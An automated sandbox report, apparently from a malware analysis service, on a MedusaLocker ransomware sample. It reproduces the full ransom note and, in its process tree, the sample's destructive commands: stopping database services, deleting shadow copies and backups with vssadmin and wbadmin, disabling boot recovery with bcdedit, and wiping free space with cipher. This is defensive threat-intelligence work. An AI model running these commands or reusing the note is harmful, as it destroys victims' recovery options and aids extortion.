Analysis

  • max time kernel
    149s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    14-08-2024 11:01

General

  • Target

    ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe

  • Size

    422KB

  • MD5

    f736ee661d70a5d7aa322f017e04b1d2

  • SHA1

    eee99e6b7c58ecc95c75cd52eb7ac02d812c1a54

  • SHA256

    ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679

  • SHA512

    23ff1b49955354a9a882ca2fd884157f75d937f00be2928acebab2a01fddcd018159cfd85df0e890cb2ecc0e40e6a02be926db29418928b320517ea6b538c8b8

  • SSDEEP

    6144:MTqhlztbElkd+s0zyykmkkES0J2txMLVesCjuwptsOXNZcX9PNCFR09KKPOeFhbb:RhDdkybr/J2tx2VeFusZXQJhkeFhbb

Malware Config

Extracted

Path

C:\How_to_back_files.html

Family

medusalocker

Ransom Note
Your personal ID: tIrCcAMdCXKn98LB56rkpwp34fcKCUYxu3NDSgjBTSv4+9MR/aF1FImC2GoxQUHtePyV/rF2lYAWdn8KuZHdcjc8EpllSakoajN7fswEkaFX/zQuhAsaI9a+JuEnkxDvCk1/NqWmv9HE3Y9M60UoLXON6qu2LfzqUoRc2F7yS/XFbw2f5UiN3Oay/qq0AoAHi13bJ++UG/ZLfDXb8EbqcxIZxLPzVZtDJfFZ9GwDhdzJerxX98rT4a3/9pWFGinXSqVWDyaOtm+/zs7s4YWl2dmotehan0H5Q9pdtDaG7CIx7xGOmPXJClVJ2UMHUEy8Eq+wcmi5ZSLYk6gznSj5jXwnN/jHuVMttTrpUFq/csgqR4ycbY+z6qih+o8oXtdFpXdPKarrUN6kXYtpv1ZihZbpCL8rjvgWGrGmkYrBUy7rpm2mgG59cV+yqghxUR/rHapct5xa0DqyMlVxTfOXSnrEopGZmzdCVoSCKp3ZVGL8Y6lw0Qc+OssINqJEQHKnV7Izr4TGJzytxtI7/FEoktdYzeaRsAbqBmvRHYF8vJ8YHQeajzHnE9CVqEl+QYwoqHBl9RA5dunZ8RKu5O3hWXzidDygzIjtFOzXRTrN201nG0lfWV2s+Gg+xA6p2+twywM3CyYU+mHpXPasYtzkKlEN0Hu1eAcpNp50LP7dnzJ4YVEh34sR4i3pgxKIM3o9FxoQowPc7nk7wMh8jPS9jChkDeykH+dClfjbj9CBjy7/pgwbjDu19hNvaqmWCeQV003URjzDgOwH6aZ77wbrprvsQICLX+7qdw5Ggh9jqWkevrGAoQ78q+U0Kmx7s1GbAi7rY8jLDsvukNOWhMbaFTy5cIhwKd7qg2bldfOMJuePct9bmYD+YrwBSlsdjheHW8Iu9WH8eieaAfT7q0Gcgj8XbpvJAivSEIf2MqWh359+OQzWwujGxpmpw7KzWrkNaK+cGzjEPaATyUnJyP1F1opirTZAgpkPsChBHheRVPmX+js9TX2UK/bkwdYb/wa8IBPzNcTOaciZ2r8gRt/RcYhcB2RiycIs1D4oDPge92R0rJyQ/O7Z/1TTy1V04bOEmyAIcZgsvCkec3E8Sdds/N1+PZfD7b2OEwYlP2Ad+JcGbNG0HqIDnKamyGuGdZPGczJWWuEDMNtWLixEU+b2lyKXrWyiP7PiGP1VBHWH7Gej1oJtCytpcPGsKM4oz4voon7JJc2VO58v7NNZoLgIdKOtH14oIfK4AwHh+9A4BaOqbhyLA3+tGSNFt6nI2WhxwV6YSCHVXyNsn3GeJNb3JUruMC/ed/jCgHbWar9RJcK5TOxQfSC08tSr07t3Ponm4na6tn6ZbqmpMA5rKRQB8p5rf7WQyFgOG2WXyEYMd2RmWz/dGrrPe7bQDDEe+nNaoaofDR0czjYhT93ELvN1FNiD7gQrEcBVpItr2us4bV0y8352IoQgF7Fh4E7JaAXq2SWxo9RNV3Hcf4XPhn8xIAA4SqRL8MPfrS7ntMqwkKXISRdtzbm/8L9C4mVuEwIKzXce5CvceHKVI5EFvCpLsuX9FRNCwrDw6SAd0Q8/cH17EgNWjDdN6ABssdTnMlJnNrrCC4Sy4/g8Htf0btx3kycqrbeIklE/W4QInkneEcqZ5Un1sRPUwBBDmTZif6kBzhsxxHdzKhtFCnde1eLIRH4c/V3XctbsXfzHIaKXGhI= /!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\ All your important files have been encrypted! Your files are safe! Only modified. (RSA+AES) ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE WILL PERMANENTLY CORRUPT IT. DO NOT MODIFY ENCRYPTED FILES. DO NOT RENAME ENCRYPTED FILES. No software available on internet can help you. We are the only ones able to solve your problem. We gathered highly confidential/personal data. These data are currently stored on a private server. This server will be immediately destroyed after your payment. If you decide to not pay, we will release your data to public or re-seller. So you can expect your data to be publicly available in the near future.. We only seek money and our goal is not to damage your reputation or prevent your business from running. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. Contact us for price and get decryption software. email: [email protected] [email protected] * To contact us, create a new free email account on the site: protonmail.com IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER. * Tor-chat to always be in touch: qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion

Signatures

  • MedusaLocker

    Ransomware with several variants first seen in September 2019.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (186) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 26 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
  • Modifies registry class 5 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
        "C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Adds Run key to start application
        • Enumerates connected drives
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2068
        • C:\Windows\SysWOW64\cmd.exe
          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:264
          • C:\Windows\system32\cmd.exe
            C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
            4⤵
              PID:3060
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1428
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2928
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlbrowser.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2248
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2836
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2912
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sql writer.exe
                5⤵
                • Kills process with taskkill
                PID:2824
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2776
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2760
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlserv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2924
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2788
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3040
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im msmdsrv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3032
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2792
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1104
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im MsDtsSrvr.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2620
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2696
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
              4⤵
                PID:2384
                • C:\Windows\system32\taskkill.exe
                  taskkill -f -im sqlceip.exe
                  5⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1224
            • C:\Windows\SysWOW64\cmd.exe
              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1948
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
                4⤵
                  PID:2892
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im fdlauncher.exe
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2040
              • C:\Windows\SysWOW64\cmd.exe
                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1772
                • C:\Windows\system32\cmd.exe
                  C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
                  4⤵
                    PID:1272
                    • C:\Windows\system32\taskkill.exe
                      taskkill -f -im Ssms.exe
                      5⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2960
                • C:\Windows\SysWOW64\cmd.exe
                  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1752
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
                    4⤵
                      PID:1192
                      • C:\Windows\system32\taskkill.exe
                        taskkill -f -im SQLAGENT.EXE
                        5⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:620
                  • C:\Windows\SysWOW64\cmd.exe
                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:288
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                      4⤵
                        PID:1964
                        • C:\Windows\system32\taskkill.exe
                          taskkill -f -im fdhost.exe
                          5⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2072
                    • C:\Windows\SysWOW64\cmd.exe
                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2512
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                        4⤵
                          PID:1668
                          • C:\Windows\system32\taskkill.exe
                            taskkill -f -im ReportingServicesService.exe
                            5⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2084
                      • C:\Windows\SysWOW64\cmd.exe
                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1252
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                          4⤵
                            PID:1904
                            • C:\Windows\system32\taskkill.exe
                              taskkill -f -im msftesql.exe
                              5⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1032
                        • C:\Windows\SysWOW64\cmd.exe
                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1624
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                            4⤵
                              PID:2804
                              • C:\Windows\system32\taskkill.exe
                                taskkill -f -im pg_ctl.exe
                                5⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2292
                          • C:\Windows\SysWOW64\cmd.exe
                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1312
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                              4⤵
                                PID:1548
                                • C:\Windows\system32\taskkill.exe
                                  taskkill -f -impostgres.exe
                                  5⤵
                                  • Kills process with taskkill
                                  PID:1800
                            • C:\Windows\SysWOW64\cmd.exe
                              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1932
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                                4⤵
                                  PID:872
                                  • C:\Windows\system32\net.exe
                                    net stop MSSQLServerADHelper100
                                    5⤵
                                      PID:1860
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 stop MSSQLServerADHelper100
                                        6⤵
                                          PID:1644
                                  • C:\Windows\SysWOW64\cmd.exe
                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2392
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                      4⤵
                                        PID:1980
                                        • C:\Windows\system32\net.exe
                                          net stop MSSQL$ISARS
                                          5⤵
                                            PID:2488
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 stop MSSQL$ISARS
                                              6⤵
                                                PID:848
                                        • C:\Windows\SysWOW64\cmd.exe
                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1016
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                            4⤵
                                              PID:1472
                                              • C:\Windows\system32\net.exe
                                                net stop MSSQL$MSFW
                                                5⤵
                                                  PID:2164
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 stop MSSQL$MSFW
                                                    6⤵
                                                      PID:2456
                                              • C:\Windows\SysWOW64\cmd.exe
                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2484
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                  4⤵
                                                    PID:1712
                                                    • C:\Windows\system32\net.exe
                                                      net stop SQLAgent$ISARS
                                                      5⤵
                                                        PID:2156
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 stop SQLAgent$ISARS
                                                          6⤵
                                                            PID:2404
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2280
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                        4⤵
                                                          PID:2424
                                                          • C:\Windows\system32\net.exe
                                                            net stop SQLAgent$MSFW
                                                            5⤵
                                                              PID:1700
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 stop SQLAgent$MSFW
                                                                6⤵
                                                                  PID:1660
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1000
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
                                                              4⤵
                                                                PID:2116
                                                                • C:\Windows\system32\net.exe
                                                                  net stop SQLBrowser
                                                                  5⤵
                                                                    PID:804
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 stop SQLBrowser
                                                                      6⤵
                                                                        PID:680
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2124
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                    4⤵
                                                                      PID:1804
                                                                      • C:\Windows\system32\net.exe
                                                                        net stop REportServer$ISARS
                                                                        5⤵
                                                                          PID:888
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 stop REportServer$ISARS
                                                                            6⤵
                                                                              PID:1260
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2036
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
                                                                          4⤵
                                                                            PID:2364
                                                                            • C:\Windows\system32\net.exe
                                                                              net stop SQLWriter
                                                                              5⤵
                                                                                PID:2444
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 stop SQLWriter
                                                                                  6⤵
                                                                                    PID:1520
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2192
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                4⤵
                                                                                  PID:2644
                                                                                  • C:\Windows\system32\vssadmin.exe
                                                                                    vssadmin.exe Delete Shadows /All /Quiet
                                                                                    5⤵
                                                                                    • Interacts with shadow copies
                                                                                    PID:2264
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1656
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                  4⤵
                                                                                    PID:2744
                                                                                    • C:\Windows\system32\wbadmin.exe
                                                                                      wbadmin delete backup -keepVersion:0 -quiet
                                                                                      5⤵
                                                                                      • Deletes system backups
                                                                                      PID:1884
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1504
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                    4⤵
                                                                                      PID:3056
                                                                                      • C:\Windows\system32\wbadmin.exe
                                                                                        wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                        5⤵
                                                                                        • Deletes System State backups
                                                                                        • Drops file in Windows directory
                                                                                        PID:2760
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:1996
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                      4⤵
                                                                                        PID:2916
                                                                                        • C:\Windows\system32\wbadmin.exe
                                                                                          wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                          5⤵
                                                                                            PID:1128
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                        3⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:3060
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                          4⤵
                                                                                            PID:2840
                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                              wmic.exe SHADOWCOPY /nointeractive
                                                                                              5⤵
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:3004
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2708
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                            4⤵
                                                                                              PID:2496
                                                                                              • C:\Windows\system32\bcdedit.exe
                                                                                                bcdedit.exe /set {default} recoverynabled No
                                                                                                5⤵
                                                                                                • Modifies boot configuration data using bcdedit
                                                                                                PID:1912
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                            3⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1940
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                              4⤵
                                                                                                PID:2836
                                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                                  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                  5⤵
                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                  PID:1908
                                                                                            • C:\Windows\system32\cipher.exe
                                                                                              cipher /w:\\?\A:
                                                                                              3⤵
                                                                                              • Enumerates connected drives
                                                                                              PID:3008
                                                                                            • C:\Windows\system32\cipher.exe
                                                                                              cipher /w:\\?\C:
                                                                                              3⤵
                                                                                                PID:1124
                                                                                              • C:\Windows\system32\cipher.exe
                                                                                                cipher /w:\\?\F:
                                                                                                3⤵
                                                                                                • Enumerates connected drives
                                                                                                PID:2628
                                                                                            • C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe
                                                                                              \\?\C:\Users\Admin\AppData\Local\Temp\ce746a36f0e85da2b5a1c4ab72c78d048612a9e68968e734d962a071e0c65679.bin.exe -network
                                                                                              2⤵
                                                                                              • Adds Run key to start application
                                                                                              PID:2824
                                                                                            • C:\Windows\explorer.exe
                                                                                              "C:\Windows\explorer.exe"
                                                                                              2⤵
                                                                                                PID:792
                                                                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                "C:\Program Files\Internet Explorer\iexplore.exe" C:\How_to_back_files.html
                                                                                                2⤵
                                                                                                • Modifies Internet Explorer settings
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:1932
                                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1932 CREDAT:275457 /prefetch:2
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Modifies Internet Explorer settings
                                                                                                  • Modifies registry class
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:760
                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                              C:\Windows\system32\vssvc.exe
                                                                                              1⤵
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2632

                                                                                            Network

                                                                                            MITRE ATT&CK Enterprise v15

                                                                                            Replay Monitor

                                                                                            Loading Replay Monitor...

                                                                                            Downloads

                                                                                            • C:\How_to_back_files.html

                                                                                              Filesize

                                                                                              5KB

                                                                                              MD5

                                                                                              07264aa79c9c80b7e6cd8a14b12aa40d

                                                                                              SHA1

                                                                                              61dfd4f27cdc2d182e77a7676ec2395dc8730542

                                                                                              SHA256

                                                                                              c9fac645f65fd4583f29e2ac1831ad45472a139e4d19d6c3ea2d97d3237155a9

                                                                                              SHA512

                                                                                              49a6e7c30c230aaa3313df18ee0e7b5e6a129728a8697cf846e942878d2655bfe4ac198fd6cb8b7400ec461bcfb239fb93a1430a2874eaba919e8678ac4a581a

                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                              Filesize

                                                                                              342B

                                                                                              MD5

                                                                                              7d34816fcaf8524fd8ddcb71d216dacd

                                                                                              SHA1

                                                                                              e56e56d3a43f2eb3ed49ad94cf3c9bd4aa63343b

                                                                                              SHA256

                                                                                              891c48d6f1060a81449e4745a8838dc00d1d86d0188631b8b5a06374878caf81

                                                                                              SHA512

                                                                                              29d3b0aae5f73406f69e53319cf506d345d12a5bcfb0c1b4f1cbbd9e93d4828a87668aa9e8a05f76992d92256820a1229c73d58a85e1533a3d55768a15391310

                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                              Filesize

                                                                                              342B

                                                                                              MD5

                                                                                              f5f05f9cc522a7095131826eb5a99a0a

                                                                                              SHA1

                                                                                              91244129046920a19356c277050ec74dedd81176

                                                                                              SHA256

